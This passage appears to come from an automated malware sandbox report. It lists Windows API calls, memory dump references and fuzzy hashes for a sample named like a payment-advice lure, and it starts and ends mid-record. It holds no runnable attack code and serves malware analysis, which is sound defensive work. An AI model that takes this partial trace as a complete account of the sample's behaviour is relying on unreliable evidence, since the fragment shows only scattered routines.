                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                          • String ID: f
                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                          • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                          • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                          APIs
                                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                          • String ID: Times New Roman
                                                                                                                                          • API String ID: 3808545654-927190056
                                                                                                                                          • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                          • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                          • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                          • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                          APIs
                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3579998418-0
                                                                                                                                          • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                          • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                                          • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                          • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                                          APIs
                                                                                                                                          • wsprintfW.USER32 ref: 100024E1
                                                                                                                                          • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                            • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7591FFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2435812281-0
                                                                                                                                          • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                          • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                                          • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                          • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 176019282-0
                                                                                                                                          • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                          • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                          • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                          • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                                          • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                          • Opcode ID: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                          • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                          • Opcode Fuzzy Hash: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                          • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                          • wsprintfW.USER32 ref: 00404A12
                                                                                                                                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                          • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                          • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                          APIs
                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                          • String ID: !
                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                          • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                          • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                          • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                          • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 0040593B
                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00405945
                                                                                                                                          • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 2659869361-823278215
                                                                                                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                          • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                          • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                          APIs
                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1404258612-0
                                                                                                                                          • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                          • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                          APIs
                                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F6,75923420,00403621,?), ref: 00403839
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                          Strings
